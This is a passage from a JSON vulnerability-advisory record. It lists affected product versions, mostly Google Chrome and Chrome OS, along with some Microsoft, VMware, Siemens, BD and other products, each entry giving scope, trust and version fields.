"16.0.898.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.478.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.465.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.540.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.57" }, { "model": "vsphere integrated containers", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.46" }, { "model": "sql server for 32-bit systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "20123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1004.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.136" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.935.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.821.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.212.1" }, { "model": "max", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.492.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.923.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "42.0.2311" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.547.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.948.0" }, { "model": "sql server for x64-based systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "20123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.74" }, { "model": "enterprise linux for ibm z systems extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.114" }, { "model": "pyxis duostation", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1024.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.784.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.16" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.15" }, { "model": "windows server for 32-bit systems sp2", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "2008" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "46.0.2490.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.683.0" }, { "model": "kernel", "scope": "eq", "trust": 0.3, "vendor": "linux", "version": "4.9.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.425.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.486.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.747.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.333" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.2" }, { "model": "windows version for 32-bit systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "1017090" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1300.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.32" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1028" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.133" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.773.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.26" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.157" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.739.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.19" }, { "model": "influx", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491059" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.159.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1028.0" }, { "model": "chrome os", "scope": "ne", "trust": 0.3, "vendor": "google", "version": "65.0.3325.167" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1013" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.658.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.159" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1023" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.761.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.690.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.16" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.24" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.660.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "57.0.2987.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1676.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.137" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1669.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.587.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.16" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.321.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "39.0.2171.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.48" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.861.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.524.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.717.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.9" }, { "model": "sql server r2 for x64-based systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "200830" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.880.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.607.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.471.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.923.1" }, { "model": "simatic ipc477d", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.9" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.89" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "7.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.309.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.232" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.778.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.655.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.579.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1008" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.694.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.669.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.67" }, { "model": "simatic s7-1500 software controller", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "47.0.2526.80" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.190.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.400.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.31" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.1.5" }, { "model": "epicenter", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.592.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.902.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.444.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1272.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.548.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.640.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "53.0.2785.103" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.759.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.587.1" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.314.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.69" }, { "model": "simatic ipc677d", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.13" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.1.24" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.7" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1661.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.662.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.149" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.833.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.810.0" }, { "model": "simotion p320-4e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.871.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.31" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.51" }, 